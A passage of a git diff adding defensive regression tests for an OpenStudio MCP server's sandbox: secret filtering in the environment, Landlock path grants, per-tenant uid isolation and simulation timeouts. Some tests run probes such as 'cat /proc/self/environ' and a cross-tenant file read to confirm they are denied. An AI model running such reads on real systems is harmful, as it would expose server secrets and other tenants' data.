+    assert config._normalize_sandbox_mode("") == ""  # explicit off-alias, honored
+
+
+def test_safe_float_rejects_non_finite():
+    # Regression: a NaN/inf SIM_TIMEOUT made both `<= 0` and the elapsed-time
+    # comparison false, silently disabling wall-clock timeout enforcement.
+    from mcp_server import config
+    assert config._safe_float("nan", 7200.0) == 7200.0
+    assert config._safe_float("inf", 7200.0) == 7200.0
+    assert config._safe_float("-inf", 7200.0) == 7200.0
+    assert config._safe_float("bad", 7200.0) == 7200.0
+    assert config._safe_float("3.5", 7200.0) == pytest.approx(3.5)
+
+
+def test_build_env_drops_lc_prefixed_secret(monkeypatch, tmp_path):
+    # Regression: a bare 'LC_' allowlist prefix copied any LC_*-named host var
+    # (e.g. LC_API_TOKEN) into untrusted measure code. Only standard locale
+    # categories may pass; arbitrary names — even LC_-prefixed — are dropped.
+    from mcp_server import sandbox
+    monkeypatch.setattr(sandbox, "SANDBOX_MODE", "posix")  # force enabled() + filtering
+    monkeypatch.setenv("LC_CTYPE", "en_US.UTF-8")
+    monkeypatch.setenv("LC_API_TOKEN", "supersecret")
+    monkeypatch.setenv("MY_SECRET", "nope")
+    monkeypatch.setenv("PATH", "/usr/bin")
+    env = sandbox.build_env(tmp_path, redirect_tmp=False)
+    assert env.get("LC_CTYPE") == "en_US.UTF-8", "standard locale var must pass"
+    assert "LC_API_TOKEN" not in env, "LC_-prefixed secret must be dropped"
+    assert "MY_SECRET" not in env, "non-allowlisted secret must be dropped"
+    assert env.get("PATH") == "/usr/bin", "PATH is required and allowlisted"
+
+
+def test_wrap_cmd_grants_device_files_not_whole_dev(monkeypatch, tmp_path):
+    # Regression: granting /dev rw also exposed writable /dev/shm + /dev/mqueue
+    # (shared storage/IPC outside the run dir) and permitted mknod. Confine to the
+    # specific device FILES instead (file-level Landlock rules).
+    from mcp_server import sandbox
+    monkeypatch.setattr(sandbox, "SANDBOX_MODE", "auto")   # full tier
+    monkeypatch.setattr(sandbox, "SANDBOX_NET", "deny")
+    monkeypatch.setattr(sandbox, "_has_backend", lambda: True)
+    wrapped = sandbox.wrap_cmd(["echo", "hi"], tmp_path)
+    rw = [wrapped[i + 1] for i, a in enumerate(wrapped) if a == "--landlock-rw"]
+    ro = [wrapped[i + 1] for i, a in enumerate(wrapped) if a == "--landlock-ro"]
+    assert "/dev" not in rw, f"must not grant the whole /dev dir rw: {rw}"
+    assert "/dev/null" in rw and "/dev/zero" in rw, f"missing rw device files: {rw}"
+    assert "/dev/urandom" in ro and "/dev/random" in ro, f"missing ro device files: {ro}"
+    assert "/dev/shm" not in rw and "/dev/shm" not in ro, "/dev/shm must never be granted"  # noqa: S108
+
+
+def test_test_measure_does_not_mutate_shared_source(tmp_path, monkeypatch):
+    # Regression (Codex #3): test_measure executed in the caller's measure dir,
+    # writing test_model.osm + chowning + Landlock-granting it. For a measure under a
+    # SHARED read-only root (e.g. a bundled measure) that mutates shared/host content.
+    # The fix copies a non-writable-root measure into a private run dir and tests the
+    # copy, leaving the source untouched. (Monkeypatches config ROOTS — environment
+    # setup, like RUN_ROOT — not the unit under test.)
+    from mcp_server import config
+    from mcp_server.skills.measure_authoring import operations as mops
+
+    shared_root = tmp_path / "shared"
+    measure = shared_root / "mymeasure"
+    (measure / "tests").mkdir(parents=True)
+    (measure / "measure.rb").write_text("# fake ModelMeasure\nclass M\nend\n")
+    (measure / "tests" / "mymeasure_test.rb").write_text("require 'openstudio'\n")
+    model = shared_root / "seed.osm"
+    model.write_text("OS:Version,;\n")  # a readable file to copy as the test model
+
+    # Treat shared_root as a shared READ-ONLY root; private writable area elsewhere.
+    monkeypatch.setattr(config, "_SHARED_READ_ROOTS",
+                        [*config._SHARED_READ_ROOTS, shared_root.resolve()])
+    run_root = tmp_path / "runs"
+    run_root.mkdir()
+    monkeypatch.setattr(mops, "user_run_root", lambda: run_root)
+
+    mops.test_measure_op(str(measure), model_path=str(model))
+
+    assert not (measure / "tests" / "test_model.osm").exists(), \
+        "test_model.osm was written into the SHARED measure source — must use a private copy"
+    assert sorted(p.name for p in (measure / "tests").iterdir()) == ["mymeasure_test.rb"], \
+        "shared measure source/tests was mutated"
+
+
+def test_proc_not_in_landlock_ro_allowlist():
+    # Regression (H1): /proc was a Landlock RO root, so a confined measure could
+    # read /proc/<pid>/environ. On a non-root server (measure uid == server uid)
+    # that recovers the server secrets clean-env stripped — incl. HTTP auth
+    # tokens. /proc must NOT be granted; Landlock then denies it for everyone.
+    from mcp_server import sandbox
+    ro = sandbox._ro_paths()
+    assert "/proc" not in ro, f"/proc must not be a Landlock RO root (H1): {ro}"
+
+
+def test_full_tier_denies_proc_environ_read():
+    # Regression (H1, dual-proof): with /proc granted, a confined process could
+    # read /proc/self/environ (DAC always allows self) — the same surface that
+    # leaks /proc/<server>/environ on a non-root server. Built via the REAL
+    # wrap_cmd so it tracks the actual allowlist; the read must now be DENIED.
+    from mcp_server import sandbox
+    if sandbox.active_tier() != "landlock":
+        pytest.skip("needs full tier (OSMCP_SANDBOX=auto)")
+    workdir = tempfile.mkdtemp()
+    cmd = sandbox.wrap_cmd(["cat", "/proc/self/environ"], workdir)
+    try:
+        proc = subprocess.run(  # noqa: S603 - fixed argv, no shell
+            cmd, capture_output=True, text=True, cwd="/repo",
+            user=1001, group=1001, check=False,
+        )
+        out = (proc.stdout + proc.stderr).lower()
+        assert proc.returncode != 0, f"/proc read must be denied (H1); rc=0 out={out[:200]}"
+        assert ("denied" in out or "no such" in out
+                or "operation not permitted" in out), f"expected denial; out={out[:300]}"
+    finally:
+        shutil.rmtree(workdir, ignore_errors=True)
+
+
+def test_per_tenant_uid_gives_dac_isolation():
+    # Regression (M2): every tenant shared uid 1001, so in the posix tier (no
+    # Landlock) tenant B could read tenant A's run files by plain DAC. Per-tenant
+    # uids restore DAC isolation — a 0600 file owned by tenant A's uid is
+    # unreadable by tenant B's uid, with no Landlock involved.
+    from mcp_server import config
+    uid_a = config._derive_tenant_uid("tenantA")
+    uid_b = config._derive_tenant_uid("tenantB")
+    assert uid_a != uid_b, "distinct tenants must derive distinct uids"
+    d = Path(tempfile.mkdtemp())
+    try:
+        secret = d / "modelA.osm"
+        secret.write_text("TENANT_A_PRIVATE")
+        os.chown(secret, uid_a, uid_a)
+        secret.chmod(0o600)
+        # dir must be traversable so the denial proven is the file's, not the dir's
+        d.chmod(0o755)
+        # absolute path (no PATH lookup), fixed argv, no shell
+        proc = subprocess.run(  # noqa: S603
+            ["/bin/cat", str(secret)],
+            capture_output=True, text=True,
+            user=uid_b, group=uid_b, check=False,
+        )
+        out = (proc.stdout + proc.stderr).lower()
+        assert proc.returncode != 0, f"tenant B must not read tenant A's 0600 file; rc=0 out={out}"
+        assert "permission denied" in out, f"expected DAC denial; out={out}"
+    finally:
+        shutil.rmtree(d, ignore_errors=True)
+
+
+def test_input_root_not_in_landlock_ro_allowlist():
+    # Regression (Codex #5): /inputs (INPUT_ROOT) is a SHARED multi-tenant dir;
+    # granting it read in the Landlock policy let one tenant's confined measure read
+    # another tenant's inputs. Inputs are staged into the run dir, so /inputs must
+    # NOT be a read-only root.
+    from mcp_server import sandbox
+    from mcp_server.config import COMMON_MEASURES_DIR, COMSTOCK_MEASURES_DIR, INPUT_ROOT
+    ro = sandbox._ro_paths()
+    assert str(INPUT_ROOT) not in ro, f"INPUT_ROOT must not be a Landlock RO root: {ro}"
+    # The legitimately-needed shared measure roots are still granted.
+    assert str(COMSTOCK_MEASURES_DIR) in ro and str(COMMON_MEASURES_DIR) in ro, \
+        f"bundled-measure roots must stay readable: {ro}"
diff --git a/tests/test_sim_queue.py b/tests/test_sim_queue.py
index 03ed284..7cc93e2 100644
--- a/tests/test_sim_queue.py
+++ b/tests/test_sim_queue.py
@@ -86,6 +86,40 @@ async def _run():
         asyncio.run(_run())
 
 
+@pytest.mark.integration
+def test_sim_timeout_kills_long_run():
+    # Validates: OSMCP_SIM_TIMEOUT_SECONDS caps wall-clock — a sim that exceeds it
+    # is terminated and marked failed with a timeout error (runaway/DoS guard). A
+    # 2s cap fires long before the example-model sim could ever finish.
+    if not integration_enabled():
+        pytest.skip("Set RUN_OPENSTUDIO_INTEGRATION=1 to enable integration tests.")
+
+    with http_server({"MCP_AUTH": "none", "OSMCP_SIM_TIMEOUT_SECONDS": "2"}) as (url, _proc):
+        async def _run():
+            async with http_session(url) as s:
+                cr = unwrap(await s.call_tool(
+                    "create_example_osm", {"name": f"to_{uuid.uuid4().hex[:8]}"}))
+                assert cr["ok"] is True, cr
+                rs = unwrap(await s.call_tool(
+                    "run_simulation", {"osm_path": cr["osm_path"], "epw_path": EPW_PATH}))
+                assert rs["ok"] is True, rs
+                run_id = rs["run_id"]
+
+                status, err = rs["status"], ""
+                for _ in range(120):  # up to 60s; the 2s cap fires far sooner
+                    run = unwrap(await s.call_tool("get_run_status", {"run_id": run_id}))["run"]
+                    status, err = run["status"], (run.get("error") or "")
+                    if status in ("success", "failed", "cancelled", "error"):
+                        break
+                    await asyncio.sleep(0.5)
+
+                assert status == "failed", f"timed-out sim must be 'failed', got {status!r}"
+                assert "cap" in err.lower() or "exceeded" in err.lower(), \
+                    f"error should indicate the wall-clock timeout; got {err!r}"
+
+        asyncio.run(_run())
+
+
 @pytest.mark.integration
 def test_cancelled_running_sim_stays_cancelled():
     # Regression: _refresh_status reclassified a cancelled (running) run as "failed"
@@ -127,3 +161,61 @@ async def _run():
                     await asyncio.sleep(0.3)
 
         asyncio.run(_run())
+
+
+@pytest.mark.integration
+def test_enforce_timeouts_skips_dead_pid(monkeypatch):
+    # Regression: _enforce_timeouts marked a finished-but-unreaped run as 'failed'
+    # without checking _pid_alive, clobbering a possibly-successful result. A run
+    # whose process already exited must be left for the reaper to classify by exit
+    # code, not force-failed by the timeout enforcer.
+    import time
+
+    from mcp_server.skills.simulation import operations as ops
+
+    monkeypatch.setattr(ops, "SIM_TIMEOUT_SECONDS", 1.0)
+    started = time.time() - 10_000  # well past the 1s cap
+    rec = ops.RunRecord(
+        run_id="t_dead_pid", user_key="u", name="n", status="running",
+        created_at=started, started_at=started, ended_at=None,
+        pid=2_000_000_000,  # bogus pid -> _pid_alive() is False (no such process)
+        run_dir=Path("/runs/none"), osw_path=Path("/runs/none/in.osw"),
+        epw_path=None, exit_code=None, error=None,
+    )
+    monkeypatch.setitem(ops._RUNS, rec.run_id, rec)
+    ops._enforce_timeouts()
+    assert ops._RUNS[rec.run_id].status == "running", \
+        "dead-but-unreaped run was force-failed instead of left for the reaper"
+
+
+@pytest.mark.integration
+def test_kill_process_group_terminates_session_leader():
+    # Regression: timeout/cancel killed only the leader pid, orphaning forked
+    # children (EnergyPlus). Runs now launch in their own session (start_new_session)
+    # and _kill_process_group signals the whole group; the kernel delivers killpg to
+    # every group member, so verifying the new-session leader dies via the group path
+    # is sufficient (and never touches the server's own group).
+    import contextlib as _ctx
+    import os
+    import subprocess
+    import time
+
+    import psutil
+
+    from mcp_server.skills.simulation import operations as ops
+
+    if not hasattr(os, "getpgid"):
+        pytest.skip("POSIX process groups not available")
+    p = subprocess.Popen(["sleep", "60"], start_new_session=True)  # noqa: S607
+    try:
+        assert os.getpgid(p.pid) == p.pid, "start_new_session should make pid the group leader"
+        ops._kill_process_group(p.pid)  # SIGTERMs the group and reaps the leader
+        deadline = time.time() + 5
+        while psutil.pid_exists(p.pid) and time.time() < deadline:
+            time.sleep(0.1)
+        assert not psutil.pid_exists(p.pid), "session-leader survived group kill"
+    finally:
+        with _ctx.suppress(Exception):
+            p.kill()
+        with _ctx.suppress(Exception):
+            p.wait(timeout=2)